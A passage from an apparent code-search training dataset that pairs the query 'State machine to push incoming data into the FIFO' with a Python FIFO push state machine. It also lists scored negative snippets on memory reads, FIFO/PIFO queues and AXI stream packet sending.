"def read_memory(self, address):\n address = address & 0xFFFF\n if address in self.breads:\n self.paused = True\n self.pause_reason = 'Read at ' + hex(address)\n return self.memory.ReadMemory(self, address)",
"def _read(self):\n return np.copy(self.memory[self.head_pos])",
"def read_data(self):\n raise NotImplementedError",
"def Read(self):\n if not self._mem: return self.data\n\n logger.info(\"Read %s\" % self)\n self.data = self.hostmemmgr.read(self._mem, self.size)\n\n logger.info(\"=\" * 30, \"READ BUFFER\", \"=\" * 30)\n scapyfactory.Parse(self.data).Show()\n logger.info(\"=\" * 30, \"END READ BUFFER\", \"=\" * 30)\n\n return self.data",
"def read_state(self):\n #build a list of 0x00 bytes to send through shift registers\n #existing data will be read as zeros are shifted in\n all_zeros = []\n for i in range(self.num_registers):\n all_zeros.append(0x00)\n\n #shift in the 0x00 data in order to read current data\n shift_reg_bytes = self.e.write_SPI_bytes_to_portA(all_zeros)\n\n #write the current data back into the shift registers\n self.e.write_SPI_bytes_to_portA(shift_reg_bytes)\n\n shift_reg_bytes.reverse()\n return shift_reg_bytes",
"def memory_read(self, addr: str) -> Byte:\n print(f\"memory read {addr}\")\n _parsed_addr = self._parse_addr(addr)\n if _parsed_addr:\n return _parsed_addr.read(addr)\n data = self.memory.read(addr)\n return data",
"def read(self):\n raise NotImplementedError",
"def read_machine_state():\n with open(DUMP_FILE) as f:\n lines = f.read().split('\\n')[1:-1]\n result = []\n for line in lines:\n expr = re.search(':(.*)==', line)\n if expr:\n expr = expr.group(1)\n expr = expr.replace(' ', '').replace('\\t', '')\n expr = expr.replace('i', 'j')\n expr = expr.replace('+-', '-')\n result.append(complex(expr))\n return np.array(result)",
"def readState(f: TextIOWrapper) -> StateNode:\n table = []\n line = f.readline().strip()\n while len(line) > 0:\n table.append(line)\n line = f.readline().strip()\n line_lengths = [len(x) for x in table]\n\n # print(\"Table: \", table)\n # print(\"Lengths of table: \", line_lengths)\n\n if len(table) == 0:\n raise ValueError(\"State is missing first line of data!\")\n if min(line_lengths) != max(line_lengths):\n raise ValueError(\"State doesn't have all lines of equal size!\")\n return StateNode(\n table, \n (list(range(len(table))), list(range(len(table[0])))), \n ([], []), \n 0, \n None\n )",
"def read(self):\n return self.data[self.pointer]",
"def readData(self):\n if (self.model == 'GDS'):\n self.write(':ACQ'+str(ch)+':MEM?\\n')\n elif (self.model == 'TDS'):\n self.write('CURVe?\\n')\n\n # Check for the initial '#'; if not present, raise error.\n if (self.read(1) != '#'):\n raise Exception, \"Expected header not present\"\n\n # Read the data length indicator\n dataSize = int(self.read(int(self.read(1))))\n\n # extra steps for GDS\n if (self.model == 'GDS'):\n # subtract the 8 bytes we will read.\n dataSize -= 8\n # Read the sampling period\n hstep = struct.unpack('>f', self.read(4))[0]\n # also, fix hoff so it corresponds with that for TDS\n # FIXME: check with the scope at some point.\n hoff = hoff - float(dataSize/4) * hstep\n # Read 4 bytes to advance to the actual data: first byte\n # contains the channel and the three are not used,\n # according to the GDS800 manual.\n self.read(4)\n \n # Read data; TDS expects a 1-byte data, GDS expects 2-byte one.\n if (self.model == 'TDS'):\n data = list(struct.unpack('>'+str(dataSize)+'b',\n self.read(dataSize)))\n # TDS has a trailing '\\n' that should be drained.\n self.read(1)\n elif (self.model == 'GDS'):\n data = list(struct.unpack('>'+str(dataSize/2)+'h',\n self.read(dataSize)))\n\n return data",
"def fromState(state):",
"def readMuchData(self, len, start, context):\n\n print(\"start: {}\".format(start))\n print(\"end: {}\".format(start + len))\n\n sum = 0\n\n for i in range(start, start + len):\n try:\n key = \"key_{}\".format(i)\n address = _make_benchcontract_address(key)\n print(\"address: {}\".format(address))\n except:\n print(\"Some error\")\n\n try:\n data = context.get_state(\n [address],\n timeout=self.timeout)\n print(\"Data: {}\".format(data))\n value = int(data[\"data\"])\n print(\"Obtained {} --> {} from state\".format(key, value))\n # sum = sum + value\n except:\n print(\"No entry found for {}\".format(key))\n\n print(\"total sum: {}\".format(sum))",
"def _load_state(self, state):\n self._array, self._turn, self._score = state",
"def read(self, source):\n raise NotImplementedError( 'Needs implementation' )",
"def read_memory(self, address):\n\n return self.memory[address]",
"def read(self):\n pass",
"def read(self, addr):\n if addr < len(self.RAM):\n return self.RAM[addr]"
] |
[
"0.660556",
"0.63064694",
"0.63053113",
"0.6188742",
"0.61747855",
"0.6130439",
"0.60419524",
"0.60233593",
"0.60233593",
"0.60233593",
"0.59958494",
"0.59445846",
"0.5923876",
"0.5904313",
"0.58931416",
"0.5835286",
"0.5792846",
"0.5786805",
"0.57863224",
"0.5784955",
"0.5701061",
"0.56542075",
"0.5645067",
"0.5640805",
"0.56225735",
"0.56097925",
"0.5600275",
"0.55782944",
"0.5558536",
"0.5556932"
] |
0.6485029
|
1
|
State machine to push incoming data into the FIFO
|
def push_sm(self):
while True:
# wait to receive incoming data
data = yield self.w_in_pipe.get()
# model write latency
#for i in range(self.write_latency):
yield self.wait_sys_clks(self.write_latency)
# try to write data into FIFO
if len(self.items) < self.maxsize:
self.items.append(data)
else:
print >> sys.stderr, "ERROR: FIFO push_sm: FIFO full, cannot push {}".format(data)
# indicate write_completion
if self.w_out_pipe is not None:
done = 1
self.w_out_pipe.put(done)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def push_sm(self):\r\n popped_data = 0\r\n\r\n while True:\r\n popped_data_valid = 0\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # first enque the item\r\n self.items.append(data)\r\n # then insert in the correct position and shift (sorting)\r\n #for i in range(self.shift_latency):\r\n yield self.wait_sys_clks(self.shift_latency)\r\n self.items.sort()\r\n if len(self.items) > self.maxsize : # Peixuan Q: what if len = maxsize, should we keep the data?\r\n popped_data = self.items.pop(len(self.items)-1)\r\n popped_data_valid = 1\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put((done, popped_data, popped_data_valid)) # tuple\r",
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n #for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: FIFO pop_sm: attempted to read from empty FIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def start():\n global receivers\n global __FIFO_CMD__, __FIFO_DAT__\n\n fd = os.open(__FIFO_DAT__, os.O_RDONLY)\n def callback_dat(fd_):\n \"\"\" Callback for the receiving DATA. \"\"\"\n # receive data\n data = os.read(fd_, 8)\n if data == '':\n return\n data, = struct.unpack('<Q', data)\n # TODO: Interpret data\n __recv_notifier__ = LambdaQSocketNotifier(fd, QSocketNotifier.Read, callback_dat)\n\n while True:\n ask_and_send_command()",
"def rw_pifo_sm(self):\r\n data_words = random.sample(range(0, 20), 20)\r\n\r\n # push all data\r\n for word in data_words:\r\n print ('@ {:04d} - pushed data word {}'.format(self.env.now, word))\r\n self.pifo_w_in_pipe.put(word)\r\n ((done, popped_data, popped_data_valid)) = yield self.pifo_w_out_pipe.get() # tuple\r\n if popped_data_valid:\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, popped_data))\r\n \r\n\r\n # pop all items\r\n for i in range(min(self.pifo_maxsize,len(data_words))):\r\n # submit pop request (value in put is a don't care)\r\n self.pifo_r_in_pipe.put(1) \r\n word = yield self.pifo_r_out_pipe.get()\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, word))",
"def handleIncoming(self):\r\n\t\trawQueue = list()\r\n\r\n\t\twhile True:\r\n\t\t\tif not self.activeConnection:\r\n\t\t\t\ttime.sleep(.1)\r\n\t\t\t\tcontinue\r\n\t\t\ttry:\r\n\t\t\t\trawQueue.append(self.serialPort.read(1).decode('ascii'))\r\n\t\t\texcept serial.serialutil.SerialException as e:\r\n\t\t\t\tcontinue\r\n\t\t\t# print(rawQueue[-1], int.from_bytes(rawQueue[-1], byteorder='big'))\r\n\t\t\t# if len(rawQueue) >= 1000:\r\n\t\t\t# \trawQueue.pop(0)\r\n\t\t\t# print(rawQueue)\r\n\t\t\tif rawQueue[0] != '$': # we pop items until the first one is a $ sign\r\n\t\t\t\t# print('popping the first character')\r\n\t\t\t\trawQueue.pop(0)\r\n\t\t\tif '\\n' in rawQueue: # we assume with the \\n we have a valid message\r\n\t\t\t\t# print('valid message')\r\n\t\t\t\trawQueue.pop(0) # remove the $\r\n\t\t\t\trawPayload = rawQueue[0:rawQueue.index(\"*\")]\r\n\t\t\t\tstringPayload = \"\".join(rawPayload)\r\n\t\t\t\tvalueList = stringPayload.split(\",\")\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\tfor i in range(1, len(valueList)):\r\n\t\t\t\t\tvalueList[i] = int(valueList[i])\r\n\t\t\t\tvalueList[0] = messageTypes[valueList[0]]\r\n\r\n\t\t\t\tself.eventQueue.put(valueList)\r\n\t\t\t\trawQueue.clear()\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\t# we are going to ignore checksums for now\r",
"def push_data(self, data):\n self.incoming.write(data)",
"def consumer(state: SharedState):",
"def push(self,transition):\n \n input_to_buffer = transpose_list(transition)\n \n for item in input_to_buffer:\n self.deque.append(item)",
"def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass",
"def _flow_in(self):\n print(\"MESSENGER: flow_in online!\")\n while self.running:\n data = b\"\"\n while data[-5:] != b\"ROGER\" and self.running:\n try:\n slc = self.sock.recv(1024)\n except socket.timeout:\n time.sleep(0.1)\n except socket.error as E:\n print(\"MESSENGER: caught socket exception:\", E)\n self.teardown(1)\n except Exception as E:\n print(\"MESSENGER: generic exception:\", E)\n self.teardown(1)\n else:\n data += slc\n if not self.running:\n if data:\n print(\"MESSENGER: data left hanging:\" + data[:-5].decode(\"utf8\"))\n return\n data = data[:-5].decode(\"utf8\")\n self.recvbuffer.extend(data.split(\"ROGER\"))\n print(\"MESSENGER: flow_in exiting...\")",
"def read_incoming(self):\r\n buf = ''\r\n debug_prompt = re.compile(r'\\A[\\w]+>>? ')\r\n while 1:\r\n try:\r\n buf += os.read(self.fid, 100).decode('utf8')\r\n except:\r\n self.queue.put(None)\r\n return\r\n lines = buf.splitlines()\r\n for line in lines[:-1]:\r\n self.queue.put(line)\r\n if buf.endswith('\\n'):\r\n self.queue.put(lines[-1])\r\n buf = ''\r\n elif re.match(debug_prompt, lines[-1]):\r\n self.queue.put(lines[-1])\r\n buf = ''\r\n else:\r\n buf = lines[-1]",
"def push(self, data):\n node = OneWayNode(data)\n self.__head = node\n node.set_next(self.__head)\n self.__size += 1",
"def handle_input(self):\n difference = self.check_state()\n if not difference:\n return\n self.events = []\n self.handle_new_events(difference)\n self.update_timeval()\n self.events.append(self.sync_marker(self.timeval))\n self.write_to_pipe(self.events)",
"def __init__(self):\r\n self.queue = []\r\n self.current = False",
"def push(self, data):\n sabs = self.ac_out_buffer_size\n if len(data) > sabs:\n for i in xrange(0, len(data), sabs):\n self.producer_fifo.append(data[i:i+sabs])\n else:\n self.producer_fifo.append(data)\n self.initiate_send()",
"def on_receive(self):\n self.state = RECEIVED",
"def collect_incoming_data(self, data):\n self.__input.append(data)",
"def stream_state_changed(self,state,arg):\n pass",
"def push(self, transition, *args, **kwargs):\n raise NotImplementedError",
"def __init__(self,size=10):\n \n self.inbound = Queue() #an internal queue to manage the class properly in a thread safe manner.\n self.index = Value('i',0) #index of next item to be added.\n self.manager = Manager()\n \n self.buffer = self.manager.list() #the buffer we will store things in.\n self.size = size #the maximum size of the buffer\n self.newitem = Queue() #a blocking event to control the pop method\n t = threading.Thread(target=self.worker) #the worker that will run when items are added.\n t.start() #start the worker\n self.newitemindex = 0 #index of items to pop",
"def enqueue(self, data, flag='process'):\n self.Q['in'].put((data, flag))",
"def processIncoming(self):\n while (self.queue.qsize()):\n try:\n message = self.queue.get_nowait()\n \n self.terminal.insert(END,message)\n\n # Autoscroll the terminal if set\n if (self.autoscroll_value.get()):\n self.terminal.yview(END)\n\n except Queue.Empty:\n pass",
"def run(self):\n init()\n list_name = comet_config.REDIS_NAMESPACE + \"incoming/\" + self.service_name\n list_name_processing = list_name + \"/processing\"\n self.redis = r\n while True:\n try:\n item = self.redis.brpoplpush(list_name, list_name_processing)\n self.process_incoming(item)\n self.redis.lrem(list_name_processing, item)\n\n except redis.ConnectionError:\n pass",
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n # for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: PIFO pop_sm: attempted to read from empty PIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def push_write(self, s):\n ...",
"def processIncoming(self):\r\n while self.queue.qsize():\r\n try:\r\n volume_T101 = self.queue.get(0)\r\n self.var_pb_progress.set(volume_T101/100) #scale to 100\r\n self.var_T101.set(\"T101: \" + str(round(volume_T101,4)))\r\n self.var_LIT101.set(self.take_reading(volume_T101))\r\n self.update_physical(volume_T101)\r\n self.PLC_command()\r\n self.check_attack(volume_T101)\r\n self.output_results()\r\n self.master.update_idletasks()\r\n except queue.Empty:\r\n pass",
"def state_publisher(self):\n rospy.Subscriber('roc_command', CommandMsg, self.receive_command)\n rospy.Subscriber('joint_states', JointState, self.update_current_joint_states)\n\n pub = rospy.Publisher('joint_command', JointState, queue_size=10)\n rate = rospy.Rate(100) # 100hz\n\n while not rospy.is_shutdown():\n \"\"\"Reading the msg with the motion and command should be done here should be done here in a loop\n for now will be hard coded\n \"\"\"\n # wait for queue to have an item\n current_movement = self.queue.get()\n if not current_movement:\n continue\n\n joint_name_list, joint_goal_position_list, joint_duration_list = self.get_motion_from_movement(current_movement)\n joint_current_position_list = list() # TODO: Why resetting the joint positions?\n for joint_name in joint_name_list:\n joint_current_position_list.append(\n self.joint_current_positions[self.joint_names.index(joint_name)])\n\n \"\"\"Sort the arrays based on the shortest executionary motion till the longest\n \"\"\"\n joint_name_list = [x for (y, x) in sorted(zip(joint_duration_list, joint_name_list))]\n joint_current_position_list = [x for (y, x) in\n sorted(zip(joint_duration_list, joint_current_position_list))]\n joint_goal_position_list = [x for (y, x) in sorted(zip(joint_duration_list, joint_goal_position_list))]\n joint_duration_list = sorted(joint_duration_list)\n max_duration = max(joint_duration_list)\n\n linear_trajectory = list()\n # compute the trajectory equivelance\n for i in range(0, len(joint_name_list)):\n for j in range(0, len(joint_name_list) + 1):\n # if first position, then simply add current position\n if j == 0:\n linear_trajectory.append([joint_current_position_list[i]])\n print(\"trajectory:\", linear_trajectory)\n else:\n # Compute the scaling factor of every motion in comparison to the other.\n scaling_factor = 1.0\n if joint_duration_list[j - 1] / joint_duration_list[i] < 1:\n print(joint_duration_list[j - 1], joint_duration_list[i])\n scaling_factor = float(joint_duration_list[j - 1]) / joint_duration_list[i]\n print(scaling_factor)\n linear_trajectory[i].append(\n ((joint_goal_position_list[i] - joint_current_position_list[i]) * scaling_factor) +\n joint_current_position_list[i])\n print(\"trajectory:\", linear_trajectory)\n print(joint_duration_list)\n\n tau, smoothed_trajectory = self.motion_smoother(linear_trajectory, joint_duration_list)\n plt.plot(linear_trajectory[0], linear_trajectory[1], 'x', smoothed_trajectory[0],\n smoothed_trajectory[1], 'b')\n plt.show()\n\n for i in range(0, len(tau)):\n cmd = JointState()\n cmd.header.stamp = rospy.get_rostime()\n cmd.name = joint_name_list\n cmd.position = [smoothed_trajectory[0][i], smoothed_trajectory[1][i]]\n cmd.velocity = []\n cmd.effort = []\n pub.publish(cmd)\n rate.sleep()",
"def __init__(self):\n self.push_queue = []\n self.pop_queue = []",
"def push(self, *args, **kwargs):\n pass",
"def push(self, state, action, reward, next_state):\n\n to_add = [state, action, reward, next_state]\n if len(self.buffer) < self.capacity:\n self.buffer.append(None)\n self.buffer[self.position] = self.transition(*to_add)\n self.position = int((self.position + 1) % self.capacity)"
] |
[
"0.6671598",
"0.62894833",
"0.6145731",
"0.61236733",
"0.60589486",
"0.5953796",
"0.5827482",
"0.5810255",
"0.57340187",
"0.5702618",
"0.56995225",
"0.56634825",
"0.5663189",
"0.5631365",
"0.5625704",
"0.5597995",
"0.559065",
"0.5590326",
"0.55785394",
"0.55777264",
"0.5564686",
"0.5559531",
"0.5551272",
"0.55375904",
"0.5525597",
"0.5518435",
"0.55163574",
"0.55101234",
"0.55012953",
"0.5466736"
] |
0.7163576
|
0
|
State machine to pop data out of the FIFO upon request
|
def pop_sm(self):
while True:
# wait to receive a read request
req = yield self.r_in_pipe.get()
# model read latency
#for i in range(self.read_latency):
yield self.wait_sys_clks(self.read_latency)
# try to read head element
if len(self.items) > 0:
data = self.items[0]
self.items = self.items[1:]
else:
print >> sys.stderr, "ERROR: FIFO pop_sm: attempted to read from empty FIFO"
data = None
# write data back
self.r_out_pipe.put(data)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n # for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: PIFO pop_sm: attempted to read from empty PIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def rw_pifo_sm(self):\r\n data_words = random.sample(range(0, 20), 20)\r\n\r\n # push all data\r\n for word in data_words:\r\n print ('@ {:04d} - pushed data word {}'.format(self.env.now, word))\r\n self.pifo_w_in_pipe.put(word)\r\n ((done, popped_data, popped_data_valid)) = yield self.pifo_w_out_pipe.get() # tuple\r\n if popped_data_valid:\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, popped_data))\r\n \r\n\r\n # pop all items\r\n for i in range(min(self.pifo_maxsize,len(data_words))):\r\n # submit pop request (value in put is a don't care)\r\n self.pifo_r_in_pipe.put(1) \r\n word = yield self.pifo_r_out_pipe.get()\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, word))",
"def pop_payload(self):\n payload = self.rdb.lpop(self.key)\n if payload:\n self.pool.spawn(self.send, json.loads(payload.decode(\"utf-8\")))\n else:\n gevent.sleep(5)",
"def push_sm(self):\r\n while True:\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # try to write data into FIFO\r\n if len(self.items) < self.maxsize:\r\n self.items.append(data)\r\n else:\r\n print >> sys.stderr, \"ERROR: FIFO push_sm: FIFO full, cannot push {}\".format(data)\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put(done)",
"def pop_write(self):\n ...",
"def dequeue(self):",
"def __del__(self):\n\t\tif self.ispersist() and self._input:\n\t\t\t\tpservlet.pipe_push_state(self._pipe_desc, self._state)",
"def push_sm(self):\r\n popped_data = 0\r\n\r\n while True:\r\n popped_data_valid = 0\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # first enque the item\r\n self.items.append(data)\r\n # then insert in the correct position and shift (sorting)\r\n #for i in range(self.shift_latency):\r\n yield self.wait_sys_clks(self.shift_latency)\r\n self.items.sort()\r\n if len(self.items) > self.maxsize : # Peixuan Q: what if len = maxsize, should we keep the data?\r\n popped_data = self.items.pop(len(self.items)-1)\r\n popped_data_valid = 1\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put((done, popped_data, popped_data_valid)) # tuple\r",
"def consumer(state: SharedState):",
"def pop():",
"def dequeue(self):\n pass",
"def dequeue(self):\n pass",
"def move(self):\n active_item = self.stack.pop()\n self.backlog.put(active_item)",
"def consume(self):\n self._stored = self._stored - 1",
"def take_action(self, state):",
"def on_receive(self):\n self.state = RECEIVED",
"def pop(self):",
"def pop(self):",
"def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass",
"def pop(self):\n data = self.buffer.getvalue()\n self.buffer.seek(0)\n self.buffer.truncate()\n return data",
"def AdvanceQueue(self):\r\n self.data.pop(0)\r\n return",
"def recv_maintain(self):\n while True:\n # maintain the state list size\n while len(self.state_list) > self.state_list_size:\n self.state_list = self.state_list[(len(self.state_list) - self.state_list_size):]\n\n # read from socket, decode the message, and append to state buffer\n try:\n mesg = self.sock.recv(1024).decode()\n time.sleep(1/self.recv_rate)\n except socket.error as e:\n err = e.args[0]\n # no data in buffer for non-blocking socket to copy\n if err == errno.EAGAIN or err == errno.EWOULDBLOCK:\n mesg = None\n # other error occurs\n else:\n sys.exit(1)\n else:\n self.state_buf_str += mesg\n update_state = self.state_str_parse()\n if update_state is not None:\n for state in update_state:\n self.state_list.append(state)\n update_state = None",
"def init():\n state = {'last_action': None, 'order': None, 'stop_loss_order': None, 'stop_loss_price': None}\n\n order = get_open_order()\n if order:\n if order.type != 'stop':\n LOG.warning('Pending %s', order)\n order_state_before_cancel = cancel_order(order)\n act = read_action()\n if act.startswith('-'):\n LOG.warning('Pending action was %s', act)\n if order_state_before_cancel == 'open':\n state['last_action'] = buy_or_sell()\n # pending ma order filled\n else:\n state['order'] = order\n state['last_action'] = state['last_action'][1:]\n write_action(state['last_action'])\n LOG.info('Writing new last action %s', state['last_action'])\n return state\n state['stop_loss_order'] = order\n state['stop_loss_price'] = order.price\n if RESET:\n LOG.info('Reset requested, ignoring last action')\n state['last_action'] = 'NIX'\n state['stop_loss_order'] = None\n state['stop_loss_price'] = None\n return state\n\n state['last_action'] = read_action()\n if not state['last_action']:\n # first run\n state['last_action'] = buy_or_sell()\n write_action(state['last_action'])\n return state\n # pending ma order filled\n if state['last_action'].startswith('-'):\n LOG.warning('Pending action was %s', state['last_action'])\n state['last_action'] = state['last_action'][1:]\n write_action(state['last_action'])\n LOG.info('Writing new last action %s', state['last_action'])\n\n order = get_closed_order()\n if order and order.type != 'stop':\n state['order'] = order\n return state",
"def example_one():\n fifo = deque()\n fifo.append(1) # Producer\n x = fifo.popleft() # Consumer",
"def __init__(self):\r\n self.queue = []\r\n self.current = False",
"def _flow_in(self):\n print(\"MESSENGER: flow_in online!\")\n while self.running:\n data = b\"\"\n while data[-5:] != b\"ROGER\" and self.running:\n try:\n slc = self.sock.recv(1024)\n except socket.timeout:\n time.sleep(0.1)\n except socket.error as E:\n print(\"MESSENGER: caught socket exception:\", E)\n self.teardown(1)\n except Exception as E:\n print(\"MESSENGER: generic exception:\", E)\n self.teardown(1)\n else:\n data += slc\n if not self.running:\n if data:\n print(\"MESSENGER: data left hanging:\" + data[:-5].decode(\"utf8\"))\n return\n data = data[:-5].decode(\"utf8\")\n self.recvbuffer.extend(data.split(\"ROGER\"))\n print(\"MESSENGER: flow_in exiting...\")",
"def callback(self, data):\n self.state = data.data\n #rospy.loginfo('HEARD')",
"def pop(self):\n pass",
"def step(self):\n # Pull data from the first available input channel.\n\n input_bag = self.get()\n\n # todo add timer\n self.handle_results(input_bag, input_bag.apply(self._stack))",
"def __init__(self):\n self.push_queue = []\n self.pop_queue = []"
] |
[
"0.6621711",
"0.649071",
"0.6357225",
"0.6148396",
"0.5974678",
"0.59630424",
"0.587258",
"0.58450246",
"0.5842207",
"0.5821833",
"0.5777409",
"0.5777409",
"0.57464164",
"0.56125146",
"0.55776095",
"0.556682",
"0.5514615",
"0.5514615",
"0.5500672",
"0.5438145",
"0.5423421",
"0.54179674",
"0.5410937",
"0.5400311",
"0.5399637",
"0.53910285",
"0.5377419",
"0.5374858",
"0.53729653",
"0.5372324"
] |
0.7223649
|
0
|
State machine to pop data out of the PIFO upon request
|
def pop_sm(self):
while True:
# wait to receive a read request
req = yield self.r_in_pipe.get()
# model read latency
# for i in range(self.read_latency):
yield self.wait_sys_clks(self.read_latency)
# try to read head element
if len(self.items) > 0:
data = self.items[0]
self.items = self.items[1:]
else:
print >> sys.stderr, "ERROR: PIFO pop_sm: attempted to read from empty PIFO"
data = None
# write data back
self.r_out_pipe.put(data)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __del__(self):\n\t\tif self.ispersist() and self._input:\n\t\t\t\tpservlet.pipe_push_state(self._pipe_desc, self._state)",
"def callback(self, data):\n self.state = data.data\n #rospy.loginfo('HEARD')",
"def pop_payload(self):\n payload = self.rdb.lpop(self.key)\n if payload:\n self.pool.spawn(self.send, json.loads(payload.decode(\"utf-8\")))\n else:\n gevent.sleep(5)",
"def rw_pifo_sm(self):\r\n data_words = random.sample(range(0, 20), 20)\r\n\r\n # push all data\r\n for word in data_words:\r\n print ('@ {:04d} - pushed data word {}'.format(self.env.now, word))\r\n self.pifo_w_in_pipe.put(word)\r\n ((done, popped_data, popped_data_valid)) = yield self.pifo_w_out_pipe.get() # tuple\r\n if popped_data_valid:\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, popped_data))\r\n \r\n\r\n # pop all items\r\n for i in range(min(self.pifo_maxsize,len(data_words))):\r\n # submit pop request (value in put is a don't care)\r\n self.pifo_r_in_pipe.put(1) \r\n word = yield self.pifo_r_out_pipe.get()\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, word))",
"def take_action(self, state):",
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n #for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: FIFO pop_sm: attempted to read from empty FIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def _get_state(self):",
"def _localSetState(self,pdict):\n self.n = pdict.pop('n')\n self.p = pdict.pop('p')",
"def state_processing_do(cfg, app, win, events):",
"def _localSetState(self,pdict):\n self.p = pdict.pop('p')",
"def _localSetState(self,pdict):\n self.p = pdict.pop('p')",
"def pop(state):\n return state.env.stack.pop()",
"def pull(self):",
"def _localSetState(self,pdict):\n super()._localSetState(pdict)\n self.p = pdict.pop('p')",
"def pop():",
"def __getstate__(self):\n return None",
"def final(self, state):\n \"*** YOUR CODE HERE ***\"\n return\n util.raiseNotDefined()",
"def pop_write(self):\n ...",
"def __state_cb(self, data):\n self.state = data",
"def test_pop_objects(self):\r\n tape = copy.deepcopy(self.tape)\r\n tape.populate_database_objects()\r\n eq_(tape.notes[1].state, 'PA')",
"def step(self):\n # Pull data from the first available input channel.\n\n input_bag = self.get()\n\n # todo add timer\n self.handle_results(input_bag, input_bag.apply(self._stack))",
"def pull(self):\n raise NotImplementedError()",
"def state_finish_do(cfg, app, win, events):",
"def act(self, state):\n return",
"def pop(self, *args, **kwargs): # real signature unknown\n pass",
"def _localSetState(self,pdict):\n super()._localSetState(pdict)\n self.transition = pdict.pop('transition')\n self.steadyStatePb = pdict.pop('steadyStatePb')",
"def state_processing_exit(cfg, app, win):",
"def pop(self):",
"def pop(self):",
"def clear(self):\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()"
] |
[
"0.6127213",
"0.60501",
"0.5966249",
"0.58384705",
"0.5765319",
"0.5569881",
"0.55665207",
"0.5544534",
"0.55201185",
"0.5505476",
"0.5505476",
"0.54195637",
"0.5391677",
"0.5345437",
"0.5333264",
"0.5328006",
"0.5309682",
"0.5281757",
"0.52800685",
"0.525747",
"0.52553725",
"0.52538764",
"0.522771",
"0.52213925",
"0.52199703",
"0.5219024",
"0.51964295",
"0.5180805",
"0.5180805",
"0.5179464"
] |
0.62425005
|
0
|
Send pkt_list over AXI_stream interface
|
def write_pkts(self, pkt_list):
while True:
# wait for the next transmission
yield self.wait_sys_clks(1)
# send one word at a time
if len(pkt_list) == 0:
# no more data to send so send blanks
tdata = '\x00'*self.bus_width
tuser = Tuser(0, 0, 0)
msg = AXI_S_message(tdata,0,0,0,tuser)
self.out_pipe.put(msg)
else:
# send packets
pkt = pkt_list[0]
yield self.env.process(self.send_pkt(pkt))
# remove the pkt we just sent from the pkt_list
pkt_list = pkt_list[1:]
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def send_sus_list(key):\n while True:\n if not receive_sus():\n signature = key.create_signature(json.dumps(SUS) + '2')\n\n pack_send = Ether(dst='98:98:98:22:22:22') / \\\n IP(dst='172.16.104.16') / \\\n UDP(dport=2223, sport=2223) / \\\n DB(len_sign=len(signature), cmd=2,\n send_num=5, param=signature + json.dumps(SUS).encode())\n\n conf.iface = 'eth0'\n sendp(pack_send)",
